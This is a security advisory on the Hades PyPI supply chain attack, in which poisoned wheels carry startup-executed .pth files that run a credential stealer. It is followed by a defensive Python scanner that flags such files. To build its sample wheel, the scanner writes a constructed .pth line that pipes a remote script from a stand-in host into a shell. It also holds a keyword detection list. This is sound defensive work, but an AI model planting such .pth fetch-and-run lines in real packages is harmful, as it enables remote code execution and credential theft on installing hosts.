Hades PyPI Attack: 19 Packages Poisoned to Auto-Run Bun Credential Stealer
Summary
A new supply chain attack dubbed Hades has been discovered in the Python Package Index (PyPI). It involves 19 poisoned packages whose wheel artifacts carry a *-setup.pth file that deploys and runs a Bun-based credential stealer. The .pth mechanism is what makes this dangerous: CPython's site module reads every .pth file in site-packages at interpreter startup and exec()s any line that begins with "import", so the payload runs the next time any Python process starts on the host, whether or not the poisoned package is ever imported by the victim's code.
IFF Assessment
Hostile. The attack targets the Python ecosystem by poisoning packages on PyPI in order to steal credentials from any host that installs one of them, and the startup-time .pth trigger means a single install is enough for the stealer to run.
Defender Context
This incident highlights the ongoing threat of supply chain attacks against software development, particularly through popular package repositories such as PyPI. Because a .pth payload executes before any application code, checks that only look at what a project imports will miss it. Defenders should verify the integrity of packages they install (pin versions and hashes so an unexpected wheel fails the install), scan dependencies before and after installation, and specifically audit site-packages on developer machines, build agents and containers for .pth files containing "import" lines, since a legitimate .pth almost always holds only path entries. Monitoring for unusual child processes spawned by Python interpreters at startup, and for access to credential stores, covers the execution side.
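The following is an added example written for this page, not code from the Hades analysis or from any of the poisoned packages. It implements the audit the Summary and Defender Context describe: it opens a wheel (a zip) and a site-packages directory, finds every .pth file that CPython's site module would process, and flags lines that start with "import", since those are exec()ed at interpreter startup. The sample wheel, the package name evil_pkg, the file evil_pkg-setup.pth, the example.invalid URL and the SUSPICIOUS keyword list are all constructed for the demonstration and are never installed or executed.

```python
"""Find .pth files that execute code at interpreter startup, in wheels and in site-packages.

CPython's site.addpackage() reads each *.pth in a site directory line by line:
blank lines and lines starting with '#' are skipped, lines starting with
'import ' or 'import\t' are passed to exec(), everything else is added to
sys.path. A wheel only needs to ship a root-level .pth to run on every start.
"""
import os
import re
import tempfile
import zipfile
from pathlib import Path

# Constructed heuristic: tokens that rarely belong in a legitimate .pth import line.
SUSPICIOUS = re.compile(
    r"\b(exec|eval|compile|base64|subprocess|urllib|socket|os\.system|os\.popen)\b"
)


def executable_lines(text):
    """Return (lineno, line) for each line site.py would exec(), mirroring its check."""
    return [
        (n, line)
        for n, line in enumerate(text.splitlines(), 1)
        if line.startswith(("import ", "import\t"))
    ]


def scan_pth_text(name, text):
    """Summarise one .pth file: does it execute code, and does it look hostile?"""
    lines = executable_lines(text)
    return {
        "file": name,
        "executes_code": bool(lines),
        "suspicious": any(SUSPICIOUS.search(line) for _, line in lines),
        "lines": lines,
    }


def scan_wheel(wheel_path):
    """Report every .pth in a wheel that pip would place in site-packages.

    Root-level entries and <dist>.data/purelib/ or platlib/ entries land in
    site-packages; .pth files nested inside package directories are ignored by site.py.
    """
    findings = []
    with zipfile.ZipFile(wheel_path) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".pth"):
                continue
            parts = info.filename.split("/")
            top_level = len(parts) == 1
            data_dir = (
                len(parts) == 3
                and parts[0].endswith(".data")
                and parts[1] in ("purelib", "platlib")
            )
            if top_level or data_dir:
                text = zf.read(info.filename).decode("utf-8", errors="replace")
                findings.append(scan_pth_text(info.filename, text))
    return findings


def scan_site_packages(site_dir):
    """Audit an installed site-packages directory (only top-level *.pth are processed)."""
    return [
        scan_pth_text(str(p), p.read_text(encoding="utf-8", errors="replace"))
        for p in sorted(Path(site_dir).glob("*.pth"))
    ]


def build_sample_wheel(directory):
    """Write a constructed wheel mimicking the reported layout: a root-level *-setup.pth."""
    path = os.path.join(str(directory), "evil_pkg-1.0.0-py3-none-any.whl")
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("evil_pkg/__init__.py", "")
        zf.writestr("evil_pkg-1.0.0.dist-info/METADATA", "Metadata-Version: 2.1\nName: evil_pkg\nVersion: 1.0.0\n")
        zf.writestr("evil_pkg-1.0.0.dist-info/WHEEL", "Wheel-Version: 1.0\n")
        # Benign .pth: a plain path entry, appended to sys.path and nothing more.
        zf.writestr("evil_pkg_paths.pth", "evil_pkg/vendor\n")
        # Constructed hostile .pth: this single line would be exec()ed at every startup.
        zf.writestr("evil_pkg-setup.pth", 'import os;os.system("curl -s https://example.invalid/stage2 | sh")\n')
    return path


def demo():
    """Build the sample wheel in a temp dir, scan it, and return findings keyed by entry name."""
    with tempfile.TemporaryDirectory() as tmp:
        return {f["file"]: f for f in scan_wheel(build_sample_wheel(tmp))}


if __name__ == "__main__":
    for name, finding in demo().items():
        flag = "SUSPICIOUS" if finding["suspicious"] else ("executes" if finding["executes_code"] else "path-only")
        print(f"{flag:10} {name}")
        for n, line in finding["lines"]:
            print(f"           line {n}: {line}")
```

Run scan_site_packages() against each directory printed by `python -c "import site; print(site.getsitepackages())"` (and the user site directory) on developer hosts and build agents; any .pth whose executes_code is true deserves a look, and a match on the SUSPICIOUS heuristic deserves an incident ticket. Some legitimate tools do ship import-line .pth files (editable installs and certain coverage hooks), so treat the result as a triage list rather than a verdict.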